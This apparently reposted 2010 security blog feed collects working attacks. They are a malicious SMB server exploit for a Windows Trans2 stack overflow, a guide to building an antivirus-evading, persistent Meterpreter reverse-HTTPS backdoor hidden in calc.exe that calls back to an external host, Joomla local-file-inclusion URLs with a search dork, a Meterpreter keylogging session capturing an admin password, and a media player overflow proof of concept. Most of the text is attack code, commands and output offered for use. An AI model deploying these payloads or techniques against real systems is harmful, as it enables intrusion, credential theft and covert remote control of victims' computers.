Bamboo House

Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC

rumahbamboo — Sat, 17 Apr 2010 15:35:50 +0000

== Start Code ==

import sys,SocketServer

EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"

packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xfd\xe3\x00\x80\x1a\x49\xf9\x22\xfb\x86\xca\x01"
"\x88\xff\x00\x10\x00\xf0\xe4\x54\xc4\x50\x6c\xb2\x4a\xb9\x3a\x6b"
"\xcf\xb0\x8c\x8d\xaf"
)

packetsession = (
"\x00\x00\x01\x3d"
"\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x10\x00"
"\x04\xff\x00\x3d\x01\x00\x00\xc8\x00\x12\x01\x4e\x54\x4c\x4d\x53"
"\x53\x50\x00\x02\x00\x00\x00\x0c\x00\x0c\x00\x38\x00\x00\x00\x15"
"\x82\x8a\xe2\x16\x7a\x68\x5f\xc6\x0c\x78\xd8\x00\x00\x00\x00\x00"
"\x00\x00\x00\x84\x00\x84\x00\x44\x00\x00\x00\x05\x01\x28\x0a\x00"
"\x00\x00\x0f\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x02"
"\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x01"
"\x00\x0c\x00\x46\x00\x55\x00\x43\x00\x4b\x00\x55\x00\x32\x00\x04"
"\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b\x00\x75\x00\x32\x00\x2e"
"\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e\x00\x6c\x00\x6f\x00\x63"
"\x00\x61\x00\x6c\x00\x03\x00\x22\x00\x66\x00\x75\x00\x63\x00\x6b"
"\x00\x75\x00\x32\x00\x2e\x00\x74\x00\x65\x00\x73\x00\x74\x00\x2e"
"\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x06\x00\x04\x00\x01"
"\x00\x00\x00\x07\x00\x08\x00\xe8\x62\xc8\x16\xfb\x86\xca\x01\x00"
"\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00"
"\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
"\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00"
)

packetsession2 = (
"\x00\x00\x00\x75"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x00\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00"
"\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00"
"\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00"
"\x65\x00\x72\x00\x00"
)

packetree = (
"\x00\x00\x00\x38"
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe\x00\x08\x30\x00"
"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07"
"\x00\x49\x50\x43\x00\x00\x00\x00"
)

packetntcreate = (
"\x00\x00\x00\x87"
"\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x84\x08\x00\x08\x40\x00"
"\x2a\xff\x00\x87\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00"
"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\xff\x05\x00\xff\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9b\x01\x12"
"\x00\x9b\x01\x12\x00\x00\x00"
)

packetrans = (
"\x00\x00\x00\x5a"
"\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x30\x0b\x00\x08\x50\x00"
"\x0a\x02\x00\x18\x00\x00\x00\x02\x00\x38\x00\x00\x00\x18\x00\xff"
"\xff\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\x51\x52\x53\x54\x55\x56"
"\x02\x61"+EBP+EIP
)

class SMB1(SocketServer.BaseRequestHandler):

    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
      try:
       while True:
         print "From:", self.client_address
         data = self.request.recv(1024)

         ##Negotiate Protocol Response
         if data[8] == "\x72":
           self.request.send(packetnego)
           print "Negotiate Response sent\n"

         ##Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
         if data[8] == "\x73":
           self.request.send(packetsession)
           print "Session Response sent\n"
           #Session Setup AndX Response
           data = self.request.recv(1024)
           if data[8] == "\x73":
              self.request.send(packetsession2)
              print "Session 2 Response sent\n"

         ##Tree Connect AndX Response
         if data[8] == "\x75":
           self.request.send(packetree)
           print "TREE Response sent\n"

         ##NT Create AndX Response, FID: 0x4000
         if data[8] == "\xa2":
           self.request.send(packetntcreate)
           print "NT create Response sent\n"

         ####Trans2 Response, QUERY_FS_INFO
         if data[8] == "\x32":
           self.request.send(packetrans)
           print "Trans2 Response sent box pwned\n"

      except Exception:
         print "oups"
         self.request.close()
         print "Disconnected from", self.client_address

SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB1)
launch.serve_forever()

== End Code ==

Persistent Meterpreter over Reverse HTTPS

rumahbamboo — Sat, 17 Apr 2010 14:14:30 +0000

Botnet agents and malware go through inordinate lengths to hide their command and control traffic. From a penetration testing perspective, emulating these types of communication channels is possible, but often requires a custom toolkit to be deployed to the target. In this post I will walk through using the standard Metasploit Meterpreter payload as a persistent encrypted remote control tool.

First things first, grab the latest version of Metasploit (3.3.3) and update to the latest SVN snapshot. Revision r9058 or newer will work for this example.

Next, we need to setup a listening station for the remote system to connect to. This is the system that will be running msfconsole and handling the incoming connections. The two important variables here are the hostname or IP address (LHOST) and the listening port (LPORT). If you do not have access to a dedicated external system, you will need to configure your local firewall or NAT gateway to forward LPORT from the external interface to your listener. In this example, we want to use the brand new reverse_https stager, which in addition to going over SSL has the benefit of resolving DNS at runtime. This stager, along with reverse_tcp_dns, allows an actual hostname to be specified in the LHOST parameter. If you are using a dynamic DNS service, this would allow the reverse connect payload to follow your DNS changes.
Assuming we are running Metasploit on a typical broadband connection and behind a NAT gateway, we would first register our system with a dynamic DNS service (metasploit.kicks-ass.net), choose a listening port (8443) and then forward this from the NAT gateway to our internal machine running Metasploit. Once the port forward has been configured and the dynamic DNS entry has been activated, we can start msfconsole:

$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST metasploit.kicks-ass.net
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] HTTPS listener started on http://metasploit.kicks-ass.net:8443/
[*] Starting the payload handler…

Once the listener has been configured, you can test whether the handler is working properly by using a third-party web site test tool that supports SSL. I have had success using WAVE, but any “site check” tool will indicate whether the handler is accessible. If you access the handler URL in your browser, you should see an invalid SSL certificate prompt followed by a “No site configured at this address” message.

After the listener has been configured and tested, its time to create the actual persistent Meterpreter connect-back script. In order to avoid some of the more bothersome AV products, it makes sense to use a benign executable as a “template” and inject the payload inside, then wrap this all in a script. On your system running Metasploit, identify an executable to use as the template. I often use the standard calc.exe that ships with Windows operating system, but any moderately-sized EXE will do. Once the template has been identified, create a reverse_https Meterpreter, using the EXE template, wrapped in a script, with a persistent retry. The following command does this:

$ msfpayload windows/meterpreter/reverse_https LHOST=metasploit.kicks-ass.net LPORT=8443 R |
msfencode -x calc.exe -t loop-vbs -o final.vbs
[*] x86/shikata_ga_nai succeeded with size 408 (iteration=1)
$ ls -la final.vbs
-rw-r–r– 1 hdm hdm 955641 Apr 13 08:51 final.vbs

Finally, execute the VBS on the target system, and enjoy a 100% SSL-encrypted, DNS-aware, persistent remote connect-back. The reconnect interval can be changed by editing the VBS script itself (all the way at the bottom). To stop the connect-back, simply kill the wscript.exe process. To make this persist across reboots, add this to the standard Run key or the Startup folder.

[*] A.B.C.D:53386 Request received for /AVkev…
[*] A.B.C.D:53386 Staging connection for target Vkev received…
[*] Patching Target ID Vkev into DLL
[*] A.B.C.D:53387 Request received for /BVkev…
[*] A.B.C.D:53387 Stage connection for target Vkev received…
[*] Meterpreter session 2 opened (192.168.0.228:8443 -> A.B.C.D:53387)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: metal\dev

meterpreter > ps

Process list
============

PID   Name                          Arch Session User       Path
—   —-                          —- ——- —-       —-
0     [System Process]
4     System
404   smss.exe
520   csrss.exe
584   wininit.exe
608   csrss.exe
648   services.exe
668   lsass.exe
676   lsm.exe
792   svchost.exe
852   nvvsvc.exe
892   svchost.exe
[truncated]

Joomla Component com_rwcards – Local File Inclusion

rumahbamboo — Tue, 16 Mar 2010 22:57:53 +0000

# Title: Joomla Component com_rwcards – Local File Inclusion
# EDB-ID: 11772
# CVE-ID: ()
# OSVDB-ID: ()
# Author: altbta
# Published: 2010-03-16
# Verified: yes
# Download Exploit Code
# Download N/A

-->

view source

print ?

####################################################################

>>>>> Author : altbta [l_9@hotmail.com]

>>>>> Team : Sec Attack Team

>>>>> Home : www.v4-team.com/cc

>>>>> Script : Joomla Component com_rwcards

>>>>> Bug Type : Local File Inclusion [LFI]

>>>>> Dork : inurl:"com_rwcards"

####################################################################

===[ Exploit ]===

http://site/index.php?option=com_rwcards&view=rwcards&controller=[LFI]

http://site/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../etc/passwd%00

and

http://site/index.php?option=com_rwcards&controller=[LFI]

http://site/index.php?option=com_rwcards&controller=../../../../../../../../../../etc/passwd%00

####################################################################

RxH & ابو عذاب

Capturing Logon Credentials with Meterpreter

rumahbamboo — Sat, 13 Mar 2010 08:43:54 +0000

======= start code ========

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator b4mb00hous3

Media Player classic StatsReader (.stats file) stack buffer Overflow poc

rumahbamboo — Sat, 13 Mar 2010 05:25:50 +0000

# Title: Media Player classic StatsReader (.stats file) stack buffer Overflow poc
# EDB-ID: 11706
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PLATEN
# Published: 2010-03-12
# Verified: no
# Download Exploit Code
# Download N/A

-->

#! /usr/bin/python
#
# #############################################################################
# Media Player classic StatsReader (.stats file) stack buffer Overflow poc
# Software Link: http://mpc-hc.sourceforge.net/download-media-player-classic-hc.html
# Tested in : Windows XP SP3
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web:  WwW.ITSecTeam.com
# Found by: PLATEN @ ItSecTeam
# Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder
# patch: C:\Program Files (x86)\K-Lite Codec Pack\Tools\StatsReader.exe
#        Usage: ./stats-poc.py
# #############################################################################
#
print """
[~] Media Player clissic StatsReader (.stats file) stack buffer Overflow poc
[~] mail : Bug@ItSecTeam.com
[~] Web:  WwW.ITSecTeam.com
[~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam
"""

data= "\x41" *500000
try:
        file=open("media-poc.stats",'w')
        file.write( data )
        file.close()
        print   ("[+] File created successfully: media-poc.stats" )
except:
        print "[-] Error cant write file to system\n"